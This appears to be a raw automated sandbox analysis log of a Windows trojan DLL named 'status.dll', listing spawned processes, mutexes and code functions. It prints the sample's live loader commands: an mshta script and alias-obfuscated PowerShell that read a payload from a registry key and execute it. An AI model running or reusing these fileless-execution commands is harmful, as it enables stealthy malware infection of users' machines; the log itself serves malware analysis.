            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67D8.tmp" "c:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\status.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\status.dll
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\status.dll,DllRegisterServer
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17422 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82956 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17430 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82992 /prefetch:2
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP"
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP"
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67D8.tmp" "c:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFABD2BAAC7D7BDC70.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winDLL@80/93@8/2
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D2AB4 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{F408F8B3-C39F-46C2-ED68-A7DA711CCBAE}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{A446E4F3-B3E1-76BB-5D18-970AE1CCBBDE}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{D456EBDA-23D4-26AB-4D48-07BAD1FC2B8E}
            Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\{ECD50131-5BD8-FE31-45E0-BF1249146366}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_01
            Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{0C9EE140-FBC1-1ECF-E500-5F32E9340386}
            Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\{D47D1D27-23CF-266A-4D48-07BAD1FC2B8E}
            Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{D8EBAF0D-57FD-CA7A-A18C-7B9E6580DFB2}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{700550A9-0FDA-2200-19A4-B3765D18970A}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_01
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: status.dllStatic file information: File size 1235456 > 1048576
            Source: status.dllStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x121200
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D7DE0 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D81CB push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE06F5 push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0AB8 push edx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0880 push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0A64 push edx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0A64 push dword ptr [esp+10h]; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0BFC push dword ptr [esp+0Ch]; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0BFC push dword ptr [esp+10h]; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE05DF push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B23713 push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02D481CB push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02D47DE0 push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960880 push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960AB8 push edx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_009606F5 push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960A64 push edx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960A64 push dword ptr [esp+10h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_009605DF push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960BFC push dword ptr [esp+0Ch]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960BFC push dword ptr [esp+10h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04903713 push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_049031E0 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04AA7DE0 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04AA81CB push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C05DF push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C0BFC push dword ptr [esp+0Ch]; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C0BFC push dword ptr [esp+10h]; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C0A64 push edx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C0A64 push dword ptr [esp+10h]; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C0880 push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B039B2 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\status.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
